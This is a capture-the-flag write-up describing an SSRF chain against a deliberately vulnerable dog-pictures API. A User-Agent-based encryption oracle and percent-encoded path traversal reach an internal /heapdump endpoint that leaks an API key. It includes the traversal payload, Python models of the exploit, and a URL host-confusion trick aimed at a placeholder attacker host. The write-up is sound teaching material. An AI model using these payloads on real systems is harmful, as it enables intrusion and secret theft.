BugPoC x NahamSec CTF write-up: SSRF + internal heapdump

Analysis

After examining the HTTP traffic and script.js, the following became clear:

  1. There are three hosts:
    • doggo.buggywebsite.com -> which hosts the web front-end components (including script.js).
    • doggo-api.buggywebsite.com -> API which has the /fingerprint and /get-dogs endpoints exposed.
    • buggy-dog-pics.s3-us-west-2.amazonaws.com -> S3 bucket which hosts the dog images.
  2. The application is hosted on AWS infrastructure, since the hosts above return headers such as x-amz-request-id, x-amz-id-2 and Apigw-Requestid.
  3. The /get-dogs endpoint does the following:
    • Decrypts the x-param header which is an encrypted Fernet string.
    • It then makes an internal request to “<api-host> + /dogs + decrypted-value-of-x-param”.
    • It returns the path, statusCode and response from the above server-side request.
      • This strongly hinted at an SSRF vulnerability, provided the user could forge a valid x-param string. Luckily, the /fingerprint endpoint allows exactly this.
    • The path value in the response makes this endpoint a useful decryption primitive.
  4. The /fingerprint endpoint returns the Fernet encrypted value of {"UA": <User-Agent-request-header-value>}
    • By passing arbitrary user-agent values, we can generate valid strings which have been encrypted using the server Fernet key and may therefore be useful for SSRF as mentioned above.
    • This endpoint is a useful encryption primitive.
  5. There are some API endpoints which are not accessible to external users:
    • /dogs gives the response: Error, this endpoint is only internally accessible.
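
As a side note on item 3, a Fernet string can be recognised without the key, because the token layout is public: one version byte (0x80), an 8-byte big-endian timestamp, a 16-byte IV, the AES-CBC ciphertext and a 32-byte HMAC, all URL-safe base64 encoded. The sketch below only splits a token into those fields. The helper name parse_fernet_token and the all-zero demo token are made up for illustration; no real x-param value from the challenge is reproduced here.

```python
import base64
import struct


def parse_fernet_token(token: str) -> dict:
    """Split a Fernet token into its documented fields without decrypting it."""
    # Tokens are URL-safe base64; restore any padding that was stripped.
    raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    # Smallest valid token: version + timestamp + IV + one AES block + HMAC.
    if len(raw) < 1 + 8 + 16 + 16 + 32 or raw[0] != 0x80:
        raise ValueError("not a Fernet token")
    (timestamp,) = struct.unpack(">Q", raw[1:9])
    return {
        "version": raw[0],
        "timestamp": timestamp,
        "iv": raw[9:25],
        "ciphertext": raw[25:-32],
        "hmac": raw[-32:],
    }


# Synthetic token with the right layout but dummy (all-zero) IV, ciphertext and HMAC.
fake_raw = bytes([0x80]) + struct.pack(">Q", 1_600_000_000) + bytes(16) + bytes(32) + bytes(32)
fake_token = base64.urlsafe_b64encode(fake_raw).decode()
fields = parse_fernet_token(fake_token)
print(fake_token[:8], fields["timestamp"], len(fields["ciphertext"]))
```

The fixed version byte and the leading zero bytes of the timestamp are why Fernet tokens start with the characters gAAAAA. The trailing HMAC is also the reason a token cannot simply be edited by hand: any change invalidates it unless the server key is known.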

Solution steps

  1. For the SSRF to work, we need to control the request path. The path always begins with /dogs, and the encrypted data from /fingerprint also contains JSON characters such as {\"UA\":\", so path traversal is needed to gain full control over the request path.
  2. To test this, send a request to /fingerprint with the User-Agent header set to %2e%2e%2f%2e%2e%2fdogs?page=1# where %2e and %2f are the url-encoded values of . and /. The # at the end turns the trailing characters, such as }, into a url fragment and so makes them irrelevant. Use the encrypted fingerprint from the response as the value of the x-param header in a request to /get-dogs.
  3. This results in a valid server-side request to /dogs?page=1.
    • The /dogs?page=x endpoint just returns an array of five strings of the form https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog{number}.jpg, with number running from 5x-4 to 5x.
  4. We may now change the path and parameters to point to other internal endpoints.
  5. After trying and brute-forcing multiple endpoints, I still could not figure out what might work until I saw the hint posted on Twitter about heapdumps.
  6. A server-side request sent to /heapdump returned, as the name says, a heap dump of the Python data.
    • Trying the /heapdump endpoint with an external request gives the same response as /dogs: Error, this endpoint is only internally accessible.
    • This confirmed that it is an internal endpoint which could leak sensitive data through SSRF.
  7. The response from the SSRF request made to /heapdump also included the SECRET_API_KEY and voila, I got the flag :)
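
The traversal in steps 1 to 3 can be modelled offline. The sketch below is a rough model, not the challenge back end. It assumes the decrypted value has the shape {"UA": "<value>"}, and that some component percent-decodes the URL and collapses dot segments before routing. Which component does this is not something the traffic reveals. The names build_user_agent and resolve are made up for illustration.

```python
import posixpath
from urllib.parse import unquote

# Assumed shape of the decrypted fingerprint that gets appended to /dogs.
JSON_WRAPPER = '{{"UA": "{}"}}'


def build_user_agent(target: str) -> str:
    """Percent-encode a two-level traversal, then append the target and a '#'."""
    traversal = "../../".replace(".", "%2e").replace("/", "%2f")
    return traversal + target + "#"


def resolve(decrypted: str, prefix: str = "/dogs"):
    """Model of the server side: decode, cut the fragment, split the query, normalise."""
    raw = prefix + unquote(decrypted)
    before_fragment, _, fragment = raw.partition("#")
    path, _, query = before_fragment.partition("?")
    return posixpath.normpath(path), query, fragment


ua = build_user_agent("dogs?page=1")
dogs = resolve(JSON_WRAPPER.format(ua))
heap = resolve(JSON_WRAPPER.format(build_user_agent("heapdump")))
# A single ../ is not enough: the first ".." is glued to the JSON prefix.
one_level = resolve('{"UA": "%2e%2e%2fdogs?page=1#"}')
print(ua)
print(dogs, heap, one_level, sep="\n")
```

Under this model, two levels of traversal are needed because the prefix and the JSON opening merge into one path segment, /dogs{"UA": ".. , which contains the first pair of dots. Only the second .. is a real dot segment, and it removes that junk segment, leaving a clean path.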

BugPoC python script:

Deadends

I tried a few other things which didn’t work:

  1. Breaking the Fernet encryption scheme:
    • Fernet encryption is pretty robust when used properly. It is not vulnerable to the known-plaintext or chosen-plaintext attacks that the primitives at hand would have allowed.
    • Since I did not have the encryption key, this was a dead end.
  2. Attacking python requests library URL parsing:
    • I knew the Python requests library was being used in the back end: once I could control the path of the server-side request, I sent an internal request to /fingerprint and decrypted the resulting string using /get-dogs, which showed that the User-Agent was python-requests/2.22.0.
    • Knowing this, I tried to control the host for the SSRF as well, by fooling the url parsing of the Python requests library. This would have been possible if the url had been concatenated as http://<intended-host><any-data-except-fwd-slash-i-guess> + @<attacker-controlled-host>, in which case the library would send the request to <attacker-controlled-host> instead of <intended-host>. Unfortunately, since we could only append a controlled string after /dogs (which contains a forward slash), this did not work either.
    • This may be a good idea for a future CTF challenge ;)
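
The host-confusion idea from point 2 can be illustrated with the standard library. This sketch uses urllib.parse as a stand-in for the parsing done by the requests library, which is an assumption. The host names api.internal.example and attacker.example are placeholders, not hosts from the challenge.

```python
from urllib.parse import urlsplit

INTENDED = "api.internal.example"  # placeholder for the intended host
ATTACKER = "attacker.example"      # placeholder for an attacker-controlled host


def target_host(url: str) -> str:
    """Return the host a URL parser would connect to."""
    return urlsplit(url).hostname


# Hypothetical concatenation with no slash before the controlled string:
# everything before '@' is parsed as userinfo, so the host changes.
no_slash = target_host(f"http://{INTENDED}" + f"@{ATTACKER}/heapdump")

# Concatenation as in the challenge: the '/' of /dogs ends the authority part,
# so the '@' lands in the path and the host stays the same.
with_slash = target_host(f"http://{INTENDED}/dogs" + f"@{ATTACKER}/heapdump")

print(no_slash)
print(with_slash)
```

Once a forward slash has closed the authority component, nothing appended afterwards can change the host, which is consistent with this attempt failing.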

Summary

Overall I liked the task. It required reverse-engineering and understanding how the application back end might be functioning through the web traffic alone. Getting stuck not knowing what to do after the SSRF was frustrating, but the hint really helped! Without it, it felt like a guessing task, as I was brute-forcing common paths. However, judging from the heap dump itself, which contains lambda_function definitions, the /heapdump endpoint might be a common thing for a Python AWS Lambda application, which I perhaps should have known?